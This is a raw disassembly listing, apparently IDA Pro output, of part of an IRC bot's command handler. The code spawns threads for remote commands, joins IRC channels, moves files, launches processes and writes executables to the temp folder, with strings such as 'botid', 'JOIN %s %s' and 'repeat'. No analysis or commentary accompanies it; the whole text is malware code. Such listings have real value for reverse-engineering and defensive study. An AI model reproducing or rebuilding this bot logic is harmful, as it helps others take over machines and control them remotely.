mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_47C], eax
lea eax, [ebp+var_500]
mov [ebp+var_504], esi
push eax
call sub_418C10
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_46C], edi
push [ebp+var_47C]
mov [ebp+var_468], eax
push [ebp+var_480]
push [ebp+var_474]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_2DC]
push offset unk_436EA0
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_478], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_504]
push ebx
push eax
push offset sub_415E35
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_478]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_41248B
loc_412475: ; CODE XREF: sub_40EE72+3617�j
cmp [ebp+var_464], ebx
jnz loc_4144E3
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_412475
; ---------------------------------------------------------------------------
loc_41248B: ; CODE XREF: sub_40EE72+3601�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_436E54
jmp loc_4144D4
; ---------------------------------------------------------------------------
loc_41249C: ; CODE XREF: sub_40EE72+2710�j
; sub_40EE72+2727�j
push edi
call sub_41781F
push 7Fh
mov [ebp+var_314], eax
push [ebp+arg_18]
lea eax, [ebp+var_418]
push eax
call sub_418C10
push [ebp+arg_0]
call sub_41781F
mov esi, [ebp+arg_4]
add esp, 14h
mov [ebp+var_318], eax
lea eax, [ebp+var_398]
push [ebp+var_8C]
mov [ebp+var_420], esi
push 80h
push eax
call sub_41782A
mov eax, [ebp+var_8]
add esp, 0Ch
mov edi, [ebp+var_4]
mov [ebp+var_304], eax
push [ebp+var_318]
lea eax, [ebp+var_418]
mov [ebp+var_308], edi
push eax
push [ebp+var_314]
push esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_436E08
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 10h
push eax
call sub_416D5A
add esp, 24h
mov [ebp+var_310], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_420]
push ebx
push eax
push offset sub_407BDE
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_310]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_412588
loc_412572: ; CODE XREF: sub_40EE72+3714�j
cmp [ebp+var_300], ebx
jnz loc_4144E3
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_412572
; ---------------------------------------------------------------------------
loc_412588: ; CODE XREF: sub_40EE72+36FE�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_436DB4
jmp loc_4144D4
; ---------------------------------------------------------------------------
loc_412599: ; CODE XREF: sub_40EE72+26E2�j
; sub_40EE72+26F9�j
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_418C10
push 0FFh
lea eax, [ebp+var_680]
push [ebp+arg_18]
push eax
call sub_418C10
push [ebp+arg_0]
mov [ebp+var_57C], ebx
call sub_41781F
mov [ebp+var_578], eax
mov eax, [ebp+esi+var_84]
add esp, 1Ch
cmp eax, ebx
jz short loc_4125F5
push 10h
push ebx
push eax
call sub_418A3B
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_4125FB
; ---------------------------------------------------------------------------
loc_4125F5: ; CODE XREF: sub_40EE72+376D�j
mov [ebp+var_570], ebx
loc_4125FB: ; CODE XREF: sub_40EE72+3781�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_412612
push esi
call sub_41781F
pop ecx
mov [ebp+var_574], eax
jmp short loc_412618
; ---------------------------------------------------------------------------
loc_412612: ; CODE XREF: sub_40EE72+378F�j
mov [ebp+var_574], ebx
loc_412618: ; CODE XREF: sub_40EE72+379E�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_568], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_436D78
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_2DC]
push 16h
push eax
call sub_416D5A
add esp, 1Ch
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_40CAF1
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4126C9
loc_4126B3: ; CODE XREF: sub_40EE72+3855�j
cmp [ebp+var_560], ebx
jnz loc_411D22
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_4126B3
; ---------------------------------------------------------------------------
loc_4126C9: ; CODE XREF: sub_40EE72+383F�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_436D28
jmp loc_4128CC
; ---------------------------------------------------------------------------
loc_4126DA: ; CODE XREF: sub_40EE72+26B4�j
; sub_40EE72+26CB�j
push 7Fh
lea eax, [ebp+var_76C]
pop esi
push esi
push edi
push eax
call sub_418C10
push esi
lea eax, [ebp+var_6EC]
push [ebp+arg_18]
push eax
call sub_418C10
push esi
lea eax, [ebp+var_66C]
push [ebp+arg_0]
push eax
call sub_418C10
push esi
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_418C10
mov eax, [ebp+var_8]
add esp, 30h
mov esi, [ebp+var_4]
mov [ebp+var_564], eax
push [ebp+arg_0]
mov eax, [ebp+arg_4]
mov [ebp+var_770], eax
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
mov [ebp+var_568], esi
push edi
push offset dword_436CEC
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 0Bh
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_770]
push ebx
push eax
push offset sub_4019D7
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4127AD
loc_41279B: ; CODE XREF: sub_40EE72+3939�j
cmp [ebp+var_560], ebx
jnz short loc_4127C8
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_41279B
; ---------------------------------------------------------------------------
loc_4127AD: ; CODE XREF: sub_40EE72+3927�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2DC]
push offset dword_436CA4
push eax
call sub_4172AE
add esp, 0Ch
loc_4127C8: ; CODE XREF: sub_40EE72+392F�j
cmp [ebp+var_8], ebx
jnz loc_414E0F
push ebx
push esi
jmp loc_414617
; ---------------------------------------------------------------------------
loc_4127D8: ; CODE XREF: sub_40EE72+266F�j
; sub_40EE72+2686�j ...
push 7Fh
lea eax, [ebp+var_7E8]
pop esi
push esi
push edi
push eax
call sub_418C10
push esi
lea eax, [ebp+var_768]
push [ebp+arg_18]
push eax
call sub_418C10
push esi
lea eax, [ebp+var_6E8]
push [ebp+arg_0]
push eax
call sub_418C10
push esi
lea eax, [ebp+var_668]
push [ebp+var_8C]
push eax
call sub_418C10
push 20h
lea eax, [ebp+var_5E8]
push [ebp+arg_8]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 3Ch
mov esi, [ebp+arg_4]
mov [ebp+var_568], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
mov [ebp+var_7F0], esi
push edi
push offset unk_436C64
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 0Ah
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_7EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F0]
push ebx
push eax
push offset sub_401000
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_7EC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4128C0
loc_4128AA: ; CODE XREF: sub_40EE72+3A4C�j
cmp [ebp+var_560], ebx
jnz loc_411D22
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_4128AA
; ---------------------------------------------------------------------------
loc_4128C0: ; CODE XREF: sub_40EE72+3A36�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_436C1C
loc_4128CC: ; CODE XREF: sub_40EE72+2E92�j
; sub_40EE72+2FEE�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
jmp loc_411D1F
; ---------------------------------------------------------------------------
loc_4128DD: ; CODE XREF: sub_40EE72+2641�j
; sub_40EE72+2658�j
push 7Fh
lea eax, [ebp+var_458]
push edi
push eax
call sub_418C10
push [ebp+arg_18]
call sub_41781F
push 3Fh
mov [ebp+var_308], eax
push [ebp+arg_0]
lea eax, [ebp+var_3D8]
push eax
call sub_418C10
mov esi, [ebp+esi+var_84]
add esp, 1Ch
cmp esi, ebx
jz short loc_41292B
push 3Fh
lea eax, [ebp+var_398]
push esi
push eax
call sub_418C10
add esp, 0Ch
loc_41292B: ; CODE XREF: sub_40EE72+3AA5�j
lea eax, [ebp+var_3D8]
mov [ebp+var_304], 1
push eax
lea eax, [ebp+var_458]
push [ebp+var_308]
push eax
lea eax, [ebp+var_2DC]
push offset unk_436BDC
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 18h
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_300], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_45C]
push ebx
push eax
push offset sub_40EB92
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_300]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4129B7
loc_4129A1: ; CODE XREF: sub_40EE72+3B43�j
cmp [ebp+var_2FC], ebx
jnz loc_413A62
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_4129A1
; ---------------------------------------------------------------------------
loc_4129B7: ; CODE XREF: sub_40EE72+3B2D�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_436B94
jmp loc_411888
; ---------------------------------------------------------------------------
loc_4129C8: ; CODE XREF: sub_40EE72+2601�j
; sub_40EE72+2618�j
push [ebp+arg_18]
call sub_41781F
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_412ABF
mov esi, 80h
push edi
lea eax, [ebp+var_6F8]
push esi
push eax
call sub_41782A
add esp, 0Ch
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_41782A
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_436B58
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 0Dh
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_40144A
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_412AAE
loc_412A98: ; CODE XREF: sub_40EE72+3C3A�j
cmp [ebp+var_560], ebx
jnz loc_41460A
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_412A98
; ---------------------------------------------------------------------------
loc_412AAE: ; CODE XREF: sub_40EE72+3C24�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_436B10
jmp loc_413BFB
; ---------------------------------------------------------------------------
loc_412ABF: ; CODE XREF: sub_40EE72+3B67�j
push offset unk_436AC8
jmp loc_4145FC
; ---------------------------------------------------------------------------
loc_412AC9: ; CODE XREF: sub_40EE72+25D3�j
; sub_40EE72+25EA�j
push [ebp+arg_18]
push edi
call ds:dword_42416C ; MoveFileA
test eax, eax
jz short loc_412AF9
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push edi
push offset unk_436A94
push 200h
push eax
call sub_41782A
add esp, 14h
jmp loc_41460A
; ---------------------------------------------------------------------------
loc_412AF9: ; CODE XREF: sub_40EE72+3C63�j
push offset dword_436A78
call sub_40AA35
pop ecx
push eax
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
jmp loc_413C07
; ---------------------------------------------------------------------------
loc_412B1B: ; CODE XREF: sub_40EE72+25A5�j
; sub_40EE72+25BC�j
push edi
lea eax, [ebp+var_774]
push 104h
push eax
call sub_41782A
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_412B55
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_412B55
push eax
lea eax, [ebp+var_670]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_412B55: ; CODE XREF: sub_40EE72+3CC1�j
; sub_40EE72+3CD2�j
push [ebp+var_8C]
lea eax, [ebp+var_7F4]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_7F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_670]
push eax
lea eax, [ebp+var_774]
push eax
push offset unk_436A38
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 1Ch
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F8]
push ebx
push eax
push offset sub_408DCA
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_412C0B
loc_412BF5: ; CODE XREF: sub_40EE72+3D97�j
cmp [ebp+var_560], ebx
jnz loc_414E0F
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_412BF5
; ---------------------------------------------------------------------------
loc_412C0B: ; CODE XREF: sub_40EE72+3D81�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_4369EC
jmp loc_414E00
; ---------------------------------------------------------------------------
loc_412C1C: ; CODE XREF: sub_40EE72+2577�j
; sub_40EE72+258E�j
push 44h
lea eax, [ebp+var_4A0]
pop esi
push esi
push ebx
push eax
call sub_417330
push 1
mov [ebp+var_4A0], esi
pop esi
mov word ptr [ebp+var_470], bx
push edi
mov [ebp+var_474], esi
call sub_41781F
add esp, 10h
cmp eax, esi
jnz short loc_412C59
mov word ptr [ebp+var_470], 5
loc_412C59: ; CODE XREF: sub_40EE72+3DDC�j
cmp [ebp+var_C], ebx
jz loc_413A62
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_413A62
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_4A0]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_424120 ; CreateProcessA
test eax, eax
jnz short loc_412CA4
push offset unk_4369B8
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_412CA4: ; CODE XREF: sub_40EE72+3E26�j
push edi
push offset dword_436990
jmp loc_411888
; ---------------------------------------------------------------------------
loc_412CAF: ; CODE XREF: sub_40EE72+2549�j
; sub_40EE72+2560�j
push [ebp+arg_18]
push offset aBotid ; "botid"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412E29
lea eax, [ebp+var_3FC]
push eax
push 104h
call ds:dword_42412C ; GetTempPathA
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_418C10
lea eax, [ebp+var_2F8]
push eax
call sub_4159F2
add esp, 10h
push eax
lea eax, [ebp+var_3FC]
push eax
lea eax, [ebp+var_680]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_4172AE
mov eax, [ebp+esi+var_88]
add esp, 10h
cmp eax, ebx
mov [ebp+var_57C], 1
mov [ebp+var_578], ebx
jz short loc_412D44
push 10h
push ebx
push eax
call sub_418A3B
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_412D4A
; ---------------------------------------------------------------------------
loc_412D44: ; CODE XREF: sub_40EE72+3EBC�j
mov [ebp+var_570], ebx
loc_412D4A: ; CODE XREF: sub_40EE72+3ED0�j
mov esi, [ebp+esi+var_84]
cmp esi, ebx
jz short loc_412D64
push esi
call sub_41781F
pop ecx
mov [ebp+var_574], eax
jmp short loc_412D6A
; ---------------------------------------------------------------------------
loc_412D64: ; CODE XREF: sub_40EE72+3EE1�j
mov [ebp+var_574], ebx
loc_412D6A: ; CODE XREF: sub_40EE72+3EF0�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
push edi
lea eax, [ebp+var_2DC]
push offset unk_436948
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_2DC]
push 17h
push eax
call sub_416D5A
add esp, 18h
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_40CAF1
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_412E18
loc_412E02: ; CODE XREF: sub_40EE72+3FA4�j
cmp [ebp+var_560], ebx
jnz loc_413A62
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_412E02
; ---------------------------------------------------------------------------
loc_412E18: ; CODE XREF: sub_40EE72+3F8E�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_4368FC
jmp loc_411888
; ---------------------------------------------------------------------------
loc_412E29: ; CODE XREF: sub_40EE72+3E4E�j
push offset unk_4368A8
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_412E33: ; CODE XREF: sub_40EE72+251B�j
; sub_40EE72+2532�j
push [ebp+var_90]
push offset dword_4386A8
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F239
cmp [ebp+var_C], ebx
jz loc_40F239
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
pop ecx
pop ecx
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_436898
push eax
call sub_4172AE
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_418C10
push edi
call sub_41781F
add esp, 28h
test eax, eax
jle short loc_412EBC
push edi
call sub_41781F
imul eax, 3E8h
pop ecx
push eax
call ds:dword_424064 ; Sleep
loc_412EBC: ; CODE XREF: sub_40EE72+4034�j
push offset dword_436874
call sub_40BF6D
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_412ED0: ; CODE XREF: sub_40EE72+24ED�j
; sub_40EE72+2504�j
push [ebp+var_90]
push offset dword_4386A8
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F239
cmp [ebp+var_C], ebx
jz loc_414F45
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
mov esi, eax
mov eax, [ebp+arg_18]
inc eax
push offset aRepeat ; "repeat"
push eax
call sub_4176D0
add esp, 10h
test eax, eax
push esi
jz short loc_412F8F
push [ebp+var_8C]
lea eax, [ebp+var_2DC]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_436898
push eax
call sub_4172AE
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_418C10
loc_412F4E: ; DATA XREF: _2:off_42DE40�o
add esp, 24h
lea eax, [ebp+var_2DC]
push esi
push offset dword_436844
push eax
call sub_4172AE
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
push edi
call sub_41781F
add esp, 14h
test eax, eax
jle loc_414F45
push edi
call sub_41781F
add eax, [ebp+arg_24]
pop ecx
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_412F8F: ; CODE XREF: sub_40EE72+40A3�j
push offset dword_436800
jmp loc_411888
; ---------------------------------------------------------------------------
loc_412F99: ; CODE XREF: sub_40EE72+24BF�j
; sub_40EE72+24D6�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset dword_4367F8
push eax
call sub_4172AE
push edi
call sub_41781F
add esp, 10h
loc_412FB6: ; CODE XREF: sub_40EE72+41AE�j
test eax, eax
jle loc_414F45
push edi
call sub_41781F
cmp eax, 1F4h
pop ecx
jge loc_414F45
loc_412FD0: ; CODE XREF: sub_40EE72+4CBB�j
lea eax, [ebp+var_2DC]
push eax
push offset dword_428598
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4450CC[eax]
call sub_40D633
loc_412FF4: ; CODE XREF: sub_40EE72+4469�j
; sub_40EE72+5D42�j
add esp, 0Ch
jmp loc_414F45
; ---------------------------------------------------------------------------
loc_412FFC: ; CODE XREF: sub_40EE72+2491�j
; sub_40EE72+24A8�j
push [ebp+esi+var_88]
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
push offset dword_4367EC
push eax
call sub_4172AE
push edi
call sub_41781F
add esp, 14h
jmp short loc_412FB6
; ---------------------------------------------------------------------------
loc_413022: ; CODE XREF: sub_40EE72+2463�j
; sub_40EE72+247A�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset dword_4367E4
push eax
call sub_4172AE
push edi
call sub_41781F
add esp, 10h
test eax, eax
jle loc_414F45
push edi
call sub_41781F
cmp eax, 1F4h
pop ecx
jge loc_414F45
lea eax, [ebp+var_2DC]
push eax
push offset dword_428598
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4450CC[eax]
call sub_40D633
add esp, 0Ch
push [ebp+arg_18]
push edi
push offset dword_4367B8
jmp loc_4132D6
; ---------------------------------------------------------------------------
loc_41308E: ; CODE XREF: sub_40EE72+2435�j
; sub_40EE72+244C�j
cmp [ebp+var_C], ebx
jz loc_414F45
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4130BF
push esi
lea eax, [ebp+var_2DC]
push offset dword_4367B0
push eax
call sub_4172AE
add esp, 0Ch
loc_4130BF: ; CODE XREF: sub_40EE72+4236�j
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F45
push edi
call sub_41781F
cmp eax, 1F4h
pop ecx
jge loc_414F45
lea eax, [ebp+var_2DC]
push eax
push offset dword_428598
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4450CC[eax]
call sub_40D633
add esp, 0Ch
push esi
push edi
push offset dword_436784
jmp loc_4132D6
; ---------------------------------------------------------------------------
loc_413113: ; CODE XREF: sub_40EE72+2407�j
; sub_40EE72+241E�j
cmp [ebp+var_C], ebx
jz loc_414F45
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_414F45
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F45
push edi
call sub_41781F
cmp eax, 1F4h
pop ecx
jge loc_414F45
push esi
push offset dword_428598
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4450CC[eax]
call sub_40D633
add esp, 0Ch
push esi
push edi
push offset dword_436758
jmp loc_4132D6
; ---------------------------------------------------------------------------
loc_413181: ; CODE XREF: sub_40EE72+23D9�j
; sub_40EE72+23F0�j
cmp [ebp+var_C], ebx
jz loc_414F45
push edi
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_414F45
push esi
push offset aModeS ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push esi
push offset dword_436720
jmp loc_414F3E
; ---------------------------------------------------------------------------
loc_4131BB: ; CODE XREF: sub_40EE72+23AB�j
; sub_40EE72+23C2�j
push [ebp+var_90]
push offset dword_4386A8
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F239
push [ebp+arg_18]
push offset dword_436714
push [ebp+arg_4]
call sub_40D633
push edi
call sub_41781F
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_424064 ; Sleep
push [ebp+esi+var_88]
push [ebp+arg_18]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
push offset dword_4366F0
call sub_40BF6D
add esp, 14h
jmp loc_414F45
; ---------------------------------------------------------------------------
loc_413224: ; CODE XREF: sub_40EE72+237D�j
; sub_40EE72+2394�j
cmp [ebp+var_C], ebx
jz loc_414F45
push edi
call sub_417AB0
push [ebp+arg_8]
mov esi, eax
call sub_417AB0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_417880
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_414F45
push esi
lea eax, [ebp+var_2DC]
push offset dword_436F0C
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push edi
push [ebp+arg_4]
call sub_40D679
add esp, 20h
push esi
push edi
push offset dword_4366C4
jmp short loc_4132D6
; ---------------------------------------------------------------------------
loc_41328A: ; CODE XREF: sub_40EE72+234F�j
; sub_40EE72+2366�j
cmp [ebp+var_C], ebx
jz loc_414F45
push edi
call sub_417AB0
push [ebp+arg_8]
mov esi, eax
call sub_417AB0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_417880
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_414F45
push ebx
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_40D679
add esp, 14h
push esi
push edi
push offset dword_436698
loc_4132D6: ; CODE XREF: sub_40EE72+4217�j
; sub_40EE72+429C�j ...
call sub_40BFE1
jmp loc_412FF4
; ---------------------------------------------------------------------------
loc_4132E0: ; CODE XREF: sub_40EE72+2321�j
; sub_40EE72+2338�j
cmp [ebp+var_C], ebx
jz loc_40F239
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz loc_40F239
push eax
push edi
call sub_40BE75
pop ecx
pop ecx
push edi
push offset dword_43666C
jmp loc_413BFB
; ---------------------------------------------------------------------------
loc_413312: ; CODE XREF: sub_40EE72+22E1�j
; sub_40EE72+22F8�j
push edi
push [ebp+arg_1C]
call sub_417880
pop ecx
test eax, eax
pop ecx
jz loc_414F45
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz loc_4133B6
push esi
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_41339E
push esi
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_436898
push eax
call sub_4172AE
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_418C10
add esp, 24h
lea eax, [ebp+var_2DC]
push esi
push edi
push offset dword_436638
push eax
call sub_4172AE
add esp, 10h
inc [ebp+arg_24]
jmp loc_414AC1
; ---------------------------------------------------------------------------
loc_41339E: ; CODE XREF: sub_40EE72+44D1�j
lea eax, [ebp+var_2DC]
push offset dword_4365F8
push eax
call sub_4172AE
pop ecx
pop ecx
jmp loc_414AC1
; ---------------------------------------------------------------------------
loc_4133B6: ; CODE XREF: sub_40EE72+44BC�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_40BB8C
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
lea eax, [ebp+var_2DC]
push edi
push offset dword_4365D0
push 200h
push eax
call sub_41782A
add esp, 10h
jmp loc_414AC1
; ---------------------------------------------------------------------------
loc_413400: ; CODE XREF: sub_40EE72+22B3�j
; sub_40EE72+22CA�j
push offset aScreen ; "screen"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_413463
cmp [ebp+esi+var_8C], ebx
jz short loc_413450
push [ebp+esi+var_8C]
call sub_4085B3
cmp eax, 1
pop ecx
jnz short loc_413449
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset dword_43658C
push eax
call sub_4172AE
add esp, 0Ch
jmp short loc_413463
; ---------------------------------------------------------------------------
loc_413449: ; CODE XREF: sub_40EE72+45B8�j
push offset dword_436550
jmp short loc_413455
; ---------------------------------------------------------------------------
loc_413450: ; CODE XREF: sub_40EE72+45A6�j
push offset dword_436508
loc_413455: ; CODE XREF: sub_40EE72+45DC�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_413463: ; CODE XREF: sub_40EE72+459D�j
; sub_40EE72+45D5�j
push offset aDrivers ; "drivers"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_4134FA
mov [ebp+arg_0], ebx
